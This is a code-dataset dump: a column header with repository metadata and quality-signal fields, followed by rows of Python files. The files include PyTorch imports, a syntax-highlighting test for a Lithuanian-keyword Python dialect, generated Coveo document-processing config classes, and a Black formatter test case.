hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
16c987481eab892ef39426e2786a15d2dd718c07
| 85
|
py
|
Python
|
models/modules/DeepPose.py
|
AndreaVargasAndia/Pytorch-Human-Pose-Estimation
|
c627f04fa40da82cf1b2e231b491162b0f69e041
|
[
"MIT"
] | 423
|
2018-10-29T16:56:21.000Z
|
2022-03-31T09:17:11.000Z
|
models/modules/DeepPose.py
|
AndreaVargasAndia/Pytorch-Human-Pose-Estimation
|
c627f04fa40da82cf1b2e231b491162b0f69e041
|
[
"MIT"
] | 26
|
2019-02-21T08:38:36.000Z
|
2022-01-05T16:53:52.000Z
|
models/modules/DeepPose.py
|
AndreaVargasAndia/Pytorch-Human-Pose-Estimation
|
c627f04fa40da82cf1b2e231b491162b0f69e041
|
[
"MIT"
] | 83
|
2018-11-09T12:20:15.000Z
|
2022-03-27T06:47:15.000Z
|
import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
| 21.25
| 31
| 0.835294
| 15
| 85
| 4.733333
| 0.466667
| 0.464789
| 0.366197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129412
| 85
| 4
| 31
| 21.25
| 0.959459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bc4644db5f0feae3feed14240393c25a1b3f224e
| 6,281
|
py
|
Python
|
test/functions/decl4.py
|
Setonas/MagicSetonas
|
ef76da5f27a0506b194c58072b81424e3ce985d7
|
[
"MIT"
] | 5
|
2017-02-22T10:17:39.000Z
|
2021-04-06T16:36:13.000Z
|
test/functions/decl4.py
|
Setonas/MagicSetonas
|
ef76da5f27a0506b194c58072b81424e3ce985d7
|
[
"MIT"
] | null | null | null |
test/functions/decl4.py
|
Setonas/MagicSetonas
|
ef76da5f27a0506b194c58072b81424e3ce985d7
|
[
"MIT"
] | 1
|
2020-08-29T02:30:52.000Z
|
2020-08-29T02:30:52.000Z
|
# testing annotations split over multiple lines
apibrėžti some_func(a:
liambda x=Joks:
{key: val
dėl key, val iš
(x jei x is nebūtų Joks kitas [])
}=42):
# : comment.line.number-sign.python, punctuation.definition.comment.python, source.python
testing annotations split over multiple lines : comment.line.number-sign.python, source.python
apibrėžti : meta.function.python, source.python, storage.type.function.python
: meta.function.python, source.python
some_func : entity.name.function.python, meta.function.python, source.python
( : meta.function.parameters.python, meta.function.python, punctuation.definition.parameters.begin.python, source.python
a : meta.function.parameters.python, meta.function.python, source.python, variable.parameter.function.language.python
: : meta.function.parameters.python, meta.function.python, punctuation.separator.annotation.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
liambda : meta.function.parameters.python, meta.function.python, meta.liambda-function.python, source.python, storage.type.function.liambda.python
: meta.function.liambda.parameters.python, meta.function.parameters.python, meta.function.python, meta.liambda-function.python, source.python
x : meta.function.liambda.parameters.python, meta.function.parameters.python, meta.function.python, meta.liambda-function.python, source.python, variable.parameter.function.language.python
= : keyword.operator.python, meta.function.liambda.parameters.python, meta.function.parameters.python, meta.function.python, meta.liambda-function.python, source.python
Joks : constant.language.python, meta.function.liambda.parameters.python, meta.function.parameters.python, meta.function.python, meta.liambda-function.python, source.python
: : meta.function.parameters.python, meta.function.python, meta.liambda-function.python, punctuation.section.function.liambda.begin.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
{ : meta.function.parameters.python, meta.function.python, punctuation.definition.dict.begin.python, source.python
key : meta.function.parameters.python, meta.function.python, source.python
: : meta.function.parameters.python, meta.function.python, punctuation.separator.dict.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
val : meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
dėl : keyword.control.flow.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
key : meta.function.parameters.python, meta.function.python, source.python
, : meta.function.parameters.python, meta.function.python, punctuation.separator.element.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
val : meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
iš : keyword.operator.logical.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
( : meta.function.parameters.python, meta.function.python, punctuation.parenthesis.begin.python, source.python
x : meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
jei : keyword.control.flow.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
x : meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
is : keyword.operator.logical.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
nebūtų : keyword.operator.logical.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
Joks : constant.language.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
kitas : keyword.control.flow.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
[ : meta.function.parameters.python, meta.function.python, punctuation.definition.list.begin.python, source.python
] : meta.function.parameters.python, meta.function.python, punctuation.definition.list.end.python, source.python
) : meta.function.parameters.python, meta.function.python, punctuation.parenthesis.end.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
} : meta.function.parameters.python, meta.function.python, punctuation.definition.dict.end.python, source.python
= : keyword.operator.assignment.python, meta.function.parameters.python, meta.function.python, source.python
42 : constant.numeric.dec.python, meta.function.parameters.python, meta.function.python, source.python
) : meta.function.parameters.python, meta.function.python, punctuation.definition.parameters.end.python, source.python
: : meta.function.python, punctuation.section.function.begin.python, source.python
| 93.746269
| 200
| 0.714695
| 702
| 6,281
| 6.391738
| 0.082621
| 0.283486
| 0.385113
| 0.330733
| 0.920437
| 0.894584
| 0.8694
| 0.845108
| 0.845108
| 0.816136
| 0
| 0.000774
| 0.177042
| 6,281
| 66
| 201
| 95.166667
| 0.867286
| 0.023086
| 0
| 0.366667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
bc52fb23c1d154d0c604f28f46a9ea5ef3ec424c
| 15,777
|
py
|
Python
|
generators/simple/templates/src/platform/extensionRunner/cdf/document_config_definition.py
|
jfallaire/generator-ps-boilerplate-project
|
36f544a54442c191430451715425da98ea76a63e
|
[
"MIT"
] | 2
|
2019-07-24T16:00:51.000Z
|
2019-10-03T18:36:20.000Z
|
generators/simple/templates/src/platform/extensionRunner/cdf/document_config_definition.py
|
jfallaire/generator-ps-boilerplate-project
|
36f544a54442c191430451715425da98ea76a63e
|
[
"MIT"
] | 19
|
2019-06-20T21:58:44.000Z
|
2020-11-05T13:48:42.000Z
|
generators/simple/templates/src/platform/extensionRunner/cdf/document_config_definition.py
|
jfallaire/generator-ps-boilerplate-project
|
36f544a54442c191430451715425da98ea76a63e
|
[
"MIT"
] | 1
|
2019-06-22T17:30:42.000Z
|
2019-06-22T17:30:42.000Z
|
"""
- THIS FILE IS GENERATED -
CoveoInterfaces/CoveoInterfaces/CoveoDocumentConfigDefinition.jid
"""
from attr import attrib, attrs
from enum import auto
from typing import Dict, List, Optional as Opt, Union
from .root import CASING, JidEnumFlag, JidType
from .script_store import ScriptPackage
@attrs(kw_only=True, auto_attribs=True)
class XMLMetaData(JidType, hint="Coveo.XMLMetaData"):
name: Opt[str] = None
value: Opt[str] = None
def __init__(self, *, name: Opt[str] = None, value: Opt[str] = None) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class XMLRecordDefinition(JidType, hint="Coveo.XMLRecordDefinition"):
root: Opt[str] = None
unique_id: Opt[str] = None
body: Opt[str] = None
title: Opt[str] = None
uri: Opt[str] = attrib(default=None, metadata={CASING: "URI"})
author: Opt[str] = None
date: Opt[str] = None
date_format: Opt[str] = None
summary: Opt[str] = None
unescape_xml_entities: bool = attrib(default=True, metadata={CASING: "UnescapeXMLEntities"})
meta_data: Opt[List[XMLMetaData]] = None
def __init__(
self,
*,
root: Opt[str] = None,
unique_id: Opt[str] = None,
body: Opt[str] = None,
title: Opt[str] = None,
uri: Opt[str] = attrib(default=None, metadata={CASING: "URI"}),
author: Opt[str] = None,
date: Opt[str] = None,
date_format: Opt[str] = None,
summary: Opt[str] = None,
unescape_xml_entities: bool = attrib(default=True, metadata={CASING: "UnescapeXMLEntities"}),
meta_data: Opt[List[XMLMetaData]] = None,
) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class ConditionNode(JidType, hint="Coveo.ConditionNode"):
def __init__(self) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class AndNode(ConditionNode, hint="Coveo.AndNode"):
children: Opt[List[ConditionNode]] = None
def __init__(self, *, children: Opt[List[ConditionNode]] = None) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class OrNode(ConditionNode, hint="Coveo.OrNode"):
children: Opt[List[ConditionNode]] = None
def __init__(self, *, children: Opt[List[ConditionNode]] = None) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class NotNode(ConditionNode, hint="Coveo.NotNode"):
child: Opt[ConditionNode] = None
def __init__(self, *, child: Opt[ConditionNode] = None) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class ExistsNode(ConditionNode, hint="Coveo.ExistsNode"):
meta_name: Opt[str] = None
def __init__(self, *, meta_name: Opt[str] = None) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class EqualsNode(ConditionNode, hint="Coveo.EqualsNode"):
meta_name: Opt[str] = None
values: Opt[List[str]] = None
ignore_order: Opt[bool] = None
case_sensitive: Opt[bool] = None
def __init__(
self,
*,
meta_name: Opt[str] = None,
values: Opt[List[str]] = None,
ignore_order: Opt[bool] = None,
case_sensitive: Opt[bool] = None,
) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class LowerThanNode(ConditionNode, hint="Coveo.LowerThanNode"):
meta_name: Opt[str] = None
value: Opt[str] = None
match_all: Opt[bool] = None
case_sensitive: Opt[bool] = None
def __init__(
self,
*,
meta_name: Opt[str] = None,
value: Opt[str] = None,
match_all: Opt[bool] = None,
case_sensitive: Opt[bool] = None,
) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class GreaterThanNode(ConditionNode, hint="Coveo.GreaterThanNode"):
meta_name: Opt[str] = None
value: Opt[str] = None
match_all: Opt[bool] = None
case_sensitive: Opt[bool] = None
def __init__(
self,
*,
meta_name: Opt[str] = None,
value: Opt[str] = None,
match_all: Opt[bool] = None,
case_sensitive: Opt[bool] = None,
) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class DocumentProcessorParameters(JidType, hint="Coveo.DocumentProcessorParameters"):
"""
Attributes:
values: The map of parameters
delete_on_error: Whether to delete the document on a execution error
condition: Execute only if this condition is true
streams: The streams needed by the document processor
name: The step name that will be use as Origin
"""
values: Opt[Dict[str, str]] = None
delete_on_error: Opt[bool] = None
condition: Opt[ConditionNode] = None
streams: Opt[List[str]] = None
name: Opt[str] = None
def __init__(
self,
*,
values: Opt[Dict[str, str]] = None,
delete_on_error: Opt[bool] = None,
condition: Opt[ConditionNode] = None,
streams: Opt[List[str]] = None,
name: Opt[str] = None,
) -> None:
"""
Parameters:
values: The map of parameters
delete_on_error: Whether to delete the document on a execution error
condition: Execute only if this condition is true
streams: The streams needed by the document processor
name: The step name that will be use as Origin
"""
@attrs(kw_only=True, auto_attribs=True)
class DocumentProcessorScriptParameters(DocumentProcessorParameters, hint="Coveo.DocumentProcessorScriptParameters"):
"""
Attributes:
language: The script language
code: The script code
compiled_code: The compiled script
script_id: The unique id of the script
script_location: The location of the script in the ScriptStore
script_version: The version of the script in the ScriptStore
timeout: Maximum script execution time
packages: Packages needed by the script
"""
language: Opt[str] = None
code: Opt[str] = None
compiled_code: Opt[Union[str, bytes]] = None
script_id: Opt[str] = None
script_location: Opt[str] = None
script_version: Opt[str] = None
timeout: Opt[int] = None
packages: Opt[List[ScriptPackage]] = None
def __init__(
self,
*,
language: Opt[str] = None,
code: Opt[str] = None,
compiled_code: Opt[Union[str, bytes]] = None,
script_id: Opt[str] = None,
script_location: Opt[str] = None,
script_version: Opt[str] = None,
timeout: Opt[int] = None,
packages: Opt[List[ScriptPackage]] = None,
) -> None:
"""
Parameters:
language: The script language
code: The script code
compiled_code: The compiled script
script_id: The unique id of the script
script_location: The location of the script in the ScriptStore
script_version: The version of the script in the ScriptStore
timeout: Maximum script execution time
packages: Packages needed by the script
"""
@attrs(kw_only=True, auto_attribs=True)
class DocumentProcessor(JidType, hint="Coveo.DocumentProcessor"):
"""
Attributes:
type_: Main/Script
"""
type_: Opt[str] = attrib(default=None, metadata={CASING: "Type"})
parameters: Opt[DocumentProcessorParameters] = None
def __init__(
self,
*,
type_: Opt[str] = attrib(default=None, metadata={CASING: "Type"}),
parameters: Opt[DocumentProcessorParameters] = None,
) -> None:
"""
Parameters:
type_: Main/Script
"""
@attrs(kw_only=True, auto_attribs=True)
class CharsetDetectionHint(JidType, hint="Coveo.CharsetDetectionHint"):
charset: str = "unsure"
confidence: float = 0.5
def __init__(self, *, charset: str = "unsure", confidence: float = 0.5) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class LanguageHint(JidType, hint="Coveo.LanguageHint"):
language: Opt[str] = None
probability: float = 1.0
def __init__(self, *, language: Opt[str] = None, probability: float = 1.0) -> None:
...
class Action(JidEnumFlag):
"""
Attributes:
Retrieve: Retrieve and index the document
Reference: Only index a reference on the document
Ignore: Completely skip the document
"""
Retrieve: int = auto()
Reference: int = auto()
Ignore: int = auto()
class ActionOnError(JidEnumFlag):
"""
Attributes:
Reference: Only index a reference on the document
Ignore: Completely skip the document
"""
Reference: int = auto()
Ignore: int = auto()
class ConverterType(JidEnumFlag):
"""
Attributes:
Skip: Do not convert
"""
Detect: int = auto()
Skip: int = auto()
Html: int = auto()
IFilter: int = auto()
Wordperfect: int = auto()
Rtf: int = auto()
Excel: int = auto()
Word: int = auto()
Pdf: int = auto()
Powerpoint: int = auto()
PlainText: int = auto()
Zip: int = auto()
Xml: int = auto()
Msg: int = auto()
Mime: int = auto()
Image: int = auto()
class ExcerptSource(JidEnumFlag):
Document: int = auto()
Summary: int = auto()
@attrs(kw_only=True, auto_attribs=True)
class ExtensionSetting(JidType, hint="Coveo.ExtensionSetting"):
custom_converter: Opt[DocumentProcessor] = None
action: Opt[Action] = None
action_on_error: Opt[ActionOnError] = None
converter: Opt[ConverterType] = None
use_content_type: Opt[bool] = None
index_container: bool = True
file_type_value: Opt[str] = None
generate_thumbnail: bool = True
use_external_ht_ml_generator: Opt[bool] = attrib(default=None, metadata={CASING: "UseExternalHTMLGenerator"})
convert_directly_to_html: Opt[bool] = None
open_result_with_quick_view: Opt[bool] = None
summarize_document: bool = True
save_excerpt_blob: bool = True
excerpt_source: Opt[ExcerptSource] = None
def __init__(
self,
*,
custom_converter: Opt[DocumentProcessor] = None,
action: Opt[Action] = None,
action_on_error: Opt[ActionOnError] = None,
converter: Opt[ConverterType] = None,
use_content_type: Opt[bool] = None,
index_container: bool = True,
file_type_value: Opt[str] = None,
generate_thumbnail: bool = True,
use_external_ht_ml_generator: Opt[bool] = attrib(default=None, metadata={CASING: "UseExternalHTMLGenerator"}),
convert_directly_to_html: Opt[bool] = None,
open_result_with_quick_view: Opt[bool] = None,
summarize_document: bool = True,
save_excerpt_blob: bool = True,
excerpt_source: Opt[ExcerptSource] = None,
) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class ExtensionSettingByExtension(JidType, hint="Coveo.ExtensionSettingByExtension"):
extensions: Opt[List[str]] = None
extension_setting: Opt[ExtensionSetting] = None
def __init__(self, *, extensions: Opt[List[str]] = None, extension_setting: Opt[ExtensionSetting] = None) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class ExtensionSettings(JidType, hint="Coveo.ExtensionSettings"):
no_extension: Opt[ExtensionSetting] = None
other: Opt[ExtensionSetting] = None
by_extensions: Opt[List[ExtensionSettingByExtension]] = None
by_content_types: Opt[List[ExtensionSettingByExtension]] = None
def __init__(
self,
*,
no_extension: Opt[ExtensionSetting] = None,
other: Opt[ExtensionSetting] = None,
by_extensions: Opt[List[ExtensionSettingByExtension]] = None,
by_content_types: Opt[List[ExtensionSettingByExtension]] = None,
) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class DocumentProcessorConfig(JidType, hint="Coveo.DocumentProcessorConfig"):
max_ht_ml_output_size: int = attrib(default=10485760, metadata={CASING: "MaxHTMLOutputSize"})
max_text_output_size: int = 52428800
excel_floating_point_precision: int = 11
image_minimum_size: int = 32
timeout: int = 600
report_progression_timeout: int = 600
index_excel_numbers: bool = True
style_sheet: Opt[str] = None
languages_settings: Opt[str] = None
xml_record_definitions: Opt[List[XMLRecordDefinition]] = attrib(
default=None, metadata={CASING: "XMLRecordDefinitions"}
)
maximum_document_size: Opt[int] = None
title_grammatical_score_weight: float = 0.7
title_length_probability_weight: float = 0.7
title_percentage_of_caps_first_letters_weight: float = 0.7
title_position_score_weight: float = 0.8
field_mapping_origin: Opt[str] = None
summary_size: int = 2500
maximum_number_of_pages_to_convert: Opt[int] = None
generate_ht_ml: bool = attrib(default=True, metadata={CASING: "GenerateHTML"})
use_clickable_uri_as_base_path: Opt[bool] = None
add_raw_text_data_stream: Opt[bool] = None
beautify_documents: bool = True
index_meta: Opt[bool] = None
open_result_with_quick_view: Opt[bool] = None
summarize_document: bool = True
save_excerpt_blob: bool = True
excerpt_source: Opt[ExcerptSource] = None
charset_detection_hint: Opt[CharsetDetectionHint] = None
language_hints: Opt[List[LanguageHint]] = None
extension_settings: Opt[ExtensionSettings] = None
def __init__(
self,
*,
max_ht_ml_output_size: int = attrib(default=10485760, metadata={CASING: "MaxHTMLOutputSize"}),
max_text_output_size: int = 52428800,
excel_floating_point_precision: int = 11,
image_minimum_size: int = 32,
timeout: int = 600,
report_progression_timeout: int = 600,
index_excel_numbers: bool = True,
style_sheet: Opt[str] = None,
languages_settings: Opt[str] = None,
xml_record_definitions: Opt[List[XMLRecordDefinition]] = attrib(
default=None, metadata={CASING: "XMLRecordDefinitions"}
),
maximum_document_size: Opt[int] = None,
title_grammatical_score_weight: float = 0.7,
title_length_probability_weight: float = 0.7,
title_percentage_of_caps_first_letters_weight: float = 0.7,
title_position_score_weight: float = 0.8,
field_mapping_origin: Opt[str] = None,
summary_size: int = 2500,
maximum_number_of_pages_to_convert: Opt[int] = None,
generate_ht_ml: bool = attrib(default=True, metadata={CASING: "GenerateHTML"}),
use_clickable_uri_as_base_path: Opt[bool] = None,
add_raw_text_data_stream: Opt[bool] = None,
beautify_documents: bool = True,
index_meta: Opt[bool] = None,
open_result_with_quick_view: Opt[bool] = None,
summarize_document: bool = True,
save_excerpt_blob: bool = True,
excerpt_source: Opt[ExcerptSource] = None,
charset_detection_hint: Opt[CharsetDetectionHint] = None,
language_hints: Opt[List[LanguageHint]] = None,
extension_settings: Opt[ExtensionSettings] = None,
) -> None:
...
@attrs(kw_only=True, auto_attribs=True)
class DocumentConfig(JidType, hint="Coveo.DocumentConfig"):
index_uri: Opt[str] = None
document_processor_config: Opt[DocumentProcessorConfig] = None
pre_conversions: Opt[List[DocumentProcessor]] = None
post_conversions: Opt[List[DocumentProcessor]] = None
parameters: Opt[Dict[str, str]] = None
def __init__(
self,
*,
index_uri: Opt[str] = None,
document_processor_config: Opt[DocumentProcessorConfig] = None,
pre_conversions: Opt[List[DocumentProcessor]] = None,
post_conversions: Opt[List[DocumentProcessor]] = None,
parameters: Opt[Dict[str, str]] = None,
) -> None:
...
| 32.132383
| 118
| 0.651264
| 1,845
| 15,777
| 5.35935
| 0.134417
| 0.046723
| 0.056634
| 0.03034
| 0.810275
| 0.805522
| 0.804409
| 0.786509
| 0.763754
| 0.745854
| 0
| 0.00698
| 0.237244
| 15,777
| 490
| 119
| 32.197959
| 0.814692
| 0.112442
| 0
| 0.397059
| 1
| 0
| 0.047455
| 0.023617
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.014706
| 0
| 0.514706
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
bca5190a6dcb45fecafebba4e4c91ea6ddff9a66
| 60
|
py
|
Python
|
n2j/models/__init__.py
|
jiwoncpark/ex-con
|
6775d11ec1c3e7005890e58d16dd07b711861cdf
|
[
"MIT"
] | 1
|
2021-10-08T20:21:33.000Z
|
2021-10-08T20:21:33.000Z
|
n2j/models/__init__.py
|
jiwoncpark/node-to-joy
|
980dd6ad11971782221490c6e3267b43f242fff6
|
[
"MIT"
] | 13
|
2021-03-10T11:46:42.000Z
|
2021-08-23T19:36:08.000Z
|
n2j/models/__init__.py
|
jiwoncpark/exconvnet
|
6775d11ec1c3e7005890e58d16dd07b711861cdf
|
[
"MIT"
] | 1
|
2020-02-27T20:39:02.000Z
|
2020-02-27T20:39:02.000Z
|
from n2j.models.gnn import *
from n2j.models.n2jnet import *
| 30
| 31
| 0.783333
| 10
| 60
| 4.7
| 0.6
| 0.297872
| 0.553191
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056604
| 0.116667
| 60
| 2
| 31
| 30
| 0.830189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bccf47430a74f622392ad180bd06e4cb76e1cd1e
| 1,013
|
py
|
Python
|
tests/data/trailing_comma_optional_parens3.py
|
13Ducks/black
|
505634aafed3eca404213a0e787cf8af6a5b0ff7
|
[
"MIT"
] | null | null | null |
tests/data/trailing_comma_optional_parens3.py
|
13Ducks/black
|
505634aafed3eca404213a0e787cf8af6a5b0ff7
|
[
"MIT"
] | null | null | null |
tests/data/trailing_comma_optional_parens3.py
|
13Ducks/black
|
505634aafed3eca404213a0e787cf8af6a5b0ff7
|
[
"MIT"
] | null | null | null |
if True:
if True:
if True:
return _(
"qweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweas "
+ "qweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqwegqweasdzxcqweasdzxc.",
"qweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqwe",
) % {"reported_username": reported_username, "report_reason": report_reason}
# output
if True:
if True:
if True:
return _(
"qweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweas "
+ "qweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqwegqweasdzxcqweasdzxc.",
"qweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqweasdzxcqwe",
) % {
"reported_username": reported_username,
"report_reason": report_reason,
}
| 42.208333
| 116
| 0.694965
| 37
| 1,013
| 18.756757
| 0.297297
| 0.051873
| 0.04611
| 0.069164
| 0.991354
| 0.991354
| 0.991354
| 0.991354
| 0.991354
| 0.991354
| 0
| 0
| 0.253702
| 1,013
| 24
| 117
| 42.208333
| 0.917989
| 0.005923
| 0
| 0.736842
| 0
| 0
| 0.588469
| 0.526839
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0.105263
| 0
| 0
